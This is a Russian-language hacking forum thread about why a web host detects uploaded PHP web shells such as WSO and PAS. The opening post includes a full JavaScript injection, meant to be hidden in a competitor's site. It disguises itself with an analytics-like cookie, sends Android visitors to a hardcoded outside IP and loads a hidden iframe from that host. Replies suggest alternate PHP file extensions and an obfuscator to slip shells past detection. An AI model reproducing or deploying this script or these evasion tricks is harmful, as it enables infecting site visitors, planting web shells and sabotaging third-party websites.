хостинг обнаруживает запуск шелла

Discussion in 'Песочница' started by dondy, 13 Jul 2015.

  1. dondy

    dondy Member

    Joined:
    5 Jun 2015
    Messages:
    560
    Likes Received:
    61
    Reputations:
    5
    Forbidden: a malicious file has been detected.
    так реагирует хостинг на wso2 (и зашифрованый в base 64) и на PAS
    как он определяет шелл ? PAS же зашифрован нормально, не в base 64

    как навредить чужому сайту? как заразить сайт вирусом и убрать сайт конкурента из выдачи?
    разместив этот код например, который свиду пользователям сайта не будет заметен, поисковые системы обнаружат как вирус и заблокируют сайт вашего недруга конкурента
    вредоносный код для зихеров на сайте можно вставить хоть в сообщение контента сайта:

    Code:
    <script>
if(!getCookie("google__analytics__")){
  var gate = "http://5.61.34.53/jquery/jquery.php";
  var today = new Date(),
      tomorrow = new Date();
  tomorrow.setDate(today.getDate() + 1);
  setCookie("google__analytics__", 1, tomorrow.toGMTString());
  var ua = navigator.userAgent.toLowerCase();

  if(ua.indexOf("android") > -1)
    window.location = gate;
  else{
    var el = document.createElement("iframe");
    document.body.appendChild(el);
    el.id = 'iframe';
    el.style.width = 0;
    el.style.height = 0;
    el.src = 'http://5.61.34.53/2c24';
  }
}
function setCookie (name, value, expires, path, domain, secure) {
  document.cookie = name + "=" + escape(value) +
    ((expires) ? "; expires=" + expires : "") +
    ((path) ? "; path=" + path : "") +
    ((domain) ? "; domain=" + domain : "") +
    ((secure) ? "; secure" : "");
}
function getCookie(name) {
    var cookie = " " + document.cookie;
    var search = " " + name + "=";
    var setStr = null;
    var offset = 0;
    var end = 0;
    if (cookie.length > 0) {
    offset = cookie.indexOf(search);
    if (offset != -1) {
        offset += search.length;
        end = cookie.indexOf(";", offset)
        if (end == -1) {
        end = cookie.length;
        }
        setStr = unescape(cookie.substring(offset, end));
    }
    }
    return(setStr);
}
</script>
     
    #1 dondy, 13 Jul 2015
    Last edited: 27 Jul 2015
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    попробуйте другие расширения, php2, php3, php4, php5, phtml, pht. если не подойдет, то попробуйте обфусцировать: http://wb0.ru/phpobf.php
     
    _________________________
    #2 yarbabin, 13 Jul 2015
    dondy likes this.
  3. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    2,041
    Likes Received:
    933
    Reputations:
    199
    То есть твоё понимание работы антивирусных программ упирается в детект функции base64?
     
    _________________________
    #3 b3, 13 Jul 2015
  4. dondy

    dondy Member

    Joined:
    5 Jun 2015
    Messages:
    560
    Likes Received:
    61
    Reputations:
    5
    нет, base64 легкое почтовое шифрование его любой антивирь видит, а вот p.a.s. shell шифруется под паролем, у него своё какое то шифрование и его обнаруживает (kis 2015 не обнаруживает pas)
     
    #4 dondy, 13 Jul 2015
  5. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    913
    Likes Received:
    480
    Reputations:
    724
    Обычно ClamAV является причиной тревоги. Там свои сигнатуры. Но может быть и system.
     
    _________________________
    #5 VY_CMa, 13 Jul 2015
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,399
    Likes Received:
    883
    Reputations:
    859
    В WSO параметры передаются в запросах p1,p2,p3 и другие, что для фаервола может являться сигнатурой для запрета выполнения, также это может быть и с другими аналогичными шелами, во общим тут нужно грамотно подобрать шелл!
     
    _________________________
    #6 winstrool, 13 Jul 2015
(You must log in or sign up to post here.)